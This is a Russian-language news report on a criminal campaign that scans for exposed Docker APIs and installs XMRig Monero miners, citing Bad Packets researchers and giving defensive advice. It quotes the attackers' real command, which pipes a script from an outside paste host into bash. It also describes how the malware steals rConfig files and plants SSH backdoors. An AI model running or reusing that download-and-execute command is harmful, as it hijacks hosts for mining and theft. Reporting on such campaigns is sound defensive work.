Злоумышленники взламывают Docker-системы с доступными в Сети API.
Некая киберпреступная группировка проводит массовое сканирование интернета на предмета Docker-систем с доступными в Сети API. Злоумышленники отправляют команды Docker-системам и размещают майнеры криптовалюты Monero. Вредоносная кампания началась 24 ноября и сразу же стала заметной из-за своего масштаба.
«Пользователи могут заметить, что подобные атаки на открытые Docker-системы не являются чем-то новым и происходят довольно часто. Отличительной чертой данной кампании был большой рост активности сканирования», — сообщил соучредитель компании Bad Packets Трой Марш (Troy Mursch).
По словам исследователей из Bad Packets, группа, осуществляющая данные атаки, в настоящее время сканирует более 59 тыс. IP-сетей (сетевых блоков) в поисках открытых Docker-систем. После обнаружения уязвимого хоста, злоумышленники используют API для запуска контейнера ОС Alpine Linux, где они запускают команду chroot/mnt/bin/sh -c'curl-sL4 http:// ix.io / 1XQa | bash. Она загружает и запускает скрипт Bash с сервера злоумышленников, который устанавливает классический майнер криптовалюты XMRRig. По словам Марша, за два дня с момента начала кампании преступники уже добыли 14,82 Monero (XMR) на общую сумму чуть более $740.
Эксперты также обнаружили, что преступники не только отключают защитные решения, но завершают все процессы, связанные с конкурирующими майнерами криптовалюты, такими как DDG. Как отмечается, вредоносный скрипт также содержит функцию сканирования зараженного хоста на наличие файлов rConfig. При обнаружении данные файлы шифруются и отправляются на C&C-сервер злоумышленников. Преступники также создают бэкдор на взломанных контейнерах и оставляют SSH-ключи для более легкого доступа и удаленного контроля зараженных хостов.
Эксперты рекомендуют пользователям Docker проверить, доступны ли в Сети их API, закрыть порты и удалить нераспознанные контейнеры.
Первое — находим постоянно, второе — ждем вас